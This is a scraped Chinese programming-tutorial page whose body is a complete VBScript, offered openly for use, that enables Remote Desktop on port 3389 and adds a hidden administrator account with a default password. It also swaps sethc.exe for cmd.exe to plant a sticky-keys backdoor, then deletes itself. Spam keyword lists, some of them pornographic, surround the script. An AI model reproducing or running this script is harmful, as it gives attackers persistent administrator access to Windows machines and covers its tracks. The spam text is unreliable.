国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

可自刪除 開啟3389創(chuàng)建用戶粘滯鍵后門的vbs

2020-07-26 11:54:46
字體:
供稿:網(wǎng)友
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer & "/root/default:StdRegProv")
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F&copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe&copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 德钦县| 泌阳县| 连平县| 增城市| 邯郸市| 石景山区| 天祝| 尼木县| 冀州市| 新龙县| 松阳县| 潞城市| 平舆县| 永兴县| 德江县| 罗平县| 全州县| 万山特区| 且末县| 高尔夫| 阳原县| 东山县| 襄汾县| 龙海市| 神木县| 韶关市| 云浮市| 宁夏| 永丰县| 朔州市| 昌都县| 仲巴县| 北京市| 永靖县| 永宁县| 堆龙德庆县| 星座| 闵行区| 陕西省| 沙田区| 射阳县|